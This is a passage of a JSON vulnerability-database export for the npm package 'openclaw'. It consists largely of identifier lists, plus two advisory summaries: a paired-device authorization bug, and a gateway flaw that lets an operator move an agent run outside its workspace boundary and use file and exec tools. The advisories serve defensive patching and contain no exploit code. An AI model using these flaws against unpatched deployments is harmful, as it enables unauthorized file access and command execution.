-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerabilit
y":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerabilit
y":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerabilit
y":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerabilit
y":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-f5mf-3r52-r83w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k7fe-dqzc-kbcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89025?format=json","vulnerability_id":"VCID-k8s8-zjv4-gqdb","summary":"OpenClaw: Paired-device pairing actions were not limited to the caller device\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nA paired device session with limited pairing scope could enumerate global pairing state and act on pairing requests that belonged to another device within the same gateway scope ceiling.\n\nThis is a same-gateway paired-device authorization bug, not a remote unauthenticated issue. 
Severity is low.\n\n## Fix\n\nPairing management actions are now limited to the caller device, so non-admin paired-device sessions cannot approve or operate on unrelated pending device requests.\n\nFix commit:\n\n- `5a12f30441d5b0b151f550daa2c5c9e8db61e2e6`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5a12f30441d5b0b151f550daa2c5c9e8db61e2e6"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xrq9-jm7v-g9h7"},{"reference_url":"https://github.com/advisories/GHSA-xrq9-jm7v-g9h7","reference_id":"GHSA-xrq9-jm7v-g9h7","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xrq9-jm7v-g9h7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/opencla
w@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-xrq9-jm7v-g9h7"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k8s8-zjv4-gqdb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91202?format=json","vulnerability_id":"VCID-kcba-tshp-77d6","summary":"OpenClaw: Gateway `agent` calls could override the workspace boundary\n### Summary\n\nThe public gateway `agent` RPC allowed an authenticated operator with `operator.write` to supply attacker-controlled `spawnedBy` and `workspaceDir` values. That let the caller re-root the agent run outside its configured workspace boundary.\n\n### Impact\n\nA non-owner operator could escape the intended workspace boundary and run normal file and exec tools from an arbitrary process-accessible directory.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. 
The gateway now enforces the configured workspace boundary for agent runs regardless of caller-supplied overrides.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2rqg-gjgv-84jm","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2rqg-gjgv-84jm"},{"reference_url":"https://github.com/advisories/GHSA-2rqg-gjgv-84jm","reference_id":"GHSA-2rqg-gjgv-84jm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2rqg-gjgv-84jm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCI
D-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCI
D-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCI
D-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCI
D-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCI
D-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d